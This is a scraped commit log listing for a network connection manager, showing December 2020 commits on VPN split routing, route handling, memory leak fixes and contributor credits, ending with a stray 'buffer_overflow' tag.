Laakkonen1\-21/+158 2020-12-11vpn-provider: Drop route management from vpndJussi Laakkonen5\-100/+13 2020-12-11vpn-config: Implement function to get boolean from keyfileJussi Laakkonen2\-4/+21 2020-12-11vpn: Support SplitRouting in D-Bus variables, improve route codeJussi Laakkonen1\-20/+207 2020-12-11provider: Add support for managing SplitRoutingJussi Laakkonen2\-0/+105 2020-12-11service: Load and apply service settings after D-Bus registrationJussi Laakkonen1\-3/+3 2020-12-11service: Add property changed signal for SplitRouting valueJussi Laakkonen2\-0/+25 2020-12-11service: Expose set\_split\_routing() for internal useJussi Laakkonen2\-10/+15 2020-12-11service: Split service move functionality for internal useJussi Laakkonen2\-16/+46 2020-12-11dbus: Report back the return value of g\_dbus\_send\_message()Jussi Laakkonen1\-18/+6 2020-12-11inet: Do not add broadcast address for P2P/VPNsJussi Laakkonen20\-36/+123 2020-12-11inet: Refactor with getifaddrs() and add network route getter functionJussi Laakkonen2\-243/+326 2020-12-11inet: Add function for detecting a default routeJussi Laakkonen2\-0/+17 2020-12-11connection: Add getter for the phy index of a VPN transport serviceJussi Laakkonen2\-0/+24 2020-12-11wispr: check service before stopping portal detectionSergey Matyukevich1\-1/+17 2020-12-11AUTHORS: Mention Boleslaw's contributionsDaniel Wagner1\-0/+1 2020-12-11neard: Fix memory leaks with PendingCallBoleslaw Tokarski1\-1/+1 2020-12-11vpn: Fix memory leaks with PendingCallBoleslaw Tokarski1\-11/+30 2020-12-11vpn: Secure a race condition with flagBoleslaw Tokarski1\-2/+8 2020-12-11Revert "gdhcp: Make DHCP client timeouts suspend aware"Daniel Wagner2\-134/+52 2020-12-04vpn-provider: Cancel agent requests when removing VPNJussi Laakkonen1\-0/+6 2020-12-04AUTHORS: Mention Emmanuel's contributionsDaniel Wagner1\-0/+1 2020-12-04services: Return error for invalid hidden namesEmmanuel Vautrin1\-8/+12 2020-12-04AUTHORS: Mention Pieter's contributionsDaniel Wagner1\-0/+1 2020-12-04rtnl: Mark dsa interfaces as ethernet typePieter Cardoen1\-0/+3

Tag

#buffer_overflow